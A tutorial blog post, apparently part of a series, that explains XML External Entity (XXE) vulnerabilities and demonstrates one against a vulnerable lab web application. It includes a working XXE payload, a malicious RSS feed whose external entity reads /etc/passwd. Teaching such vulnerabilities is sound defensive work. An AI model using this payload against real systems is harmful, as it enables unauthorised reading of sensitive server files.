XML External Entity (XXE) Vulnerability - Part 2 (XXE Basics)

In part one of XXE vulnerability, we learn about some basics of XML, and in the second part of XXE Vulnerability, we will learn about the basic concept of XXE, like what XXE is and a basic example of XXE.

First, we will learn what XXE is.

XML External Entity (XXE) is a vulnerability that can be exploited in applications that utilize an XML parser to interpret XML documents. An attacker can introduce malicious code into the XML document to access external entities, scan the internal system, cause a Denial of Service (DoS), or launch other attacks.

Due to misconfiguration in the XML parser, The XML parser parses the reference of the external entity present in the XML document and processes it.

Let's see a basic example of XXE vulnerability. 

In this example, we will learn how to extract sensitive files like /etc/passwd or /etc/hosts by exploiting XXE.

I have one vulnerable Web application that takes RSS feed as input and parses it using the XML parser

Now I will create an RSS feed XML document that contains the malicious code to read /etc/passwd file and host that file in an HTTP server because vulnerable web application only accepts URL

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<feed>
        <title>Malicious RSS</title>
        <description>This is a Malicious RSS File</description>
        <entry>
                <title>Sensitive Data</title>
                <link href="http://example.com"></link>
                <content>&xxe;</content>
        </entry>
</feed>{codeBox}

In the above payload, the first line is prolog then we define the DTD in which we have defined the external entity that will include the /etc/passwd file in the content tag.

So, as you can see XML parser displays the context of /etc/passwd file.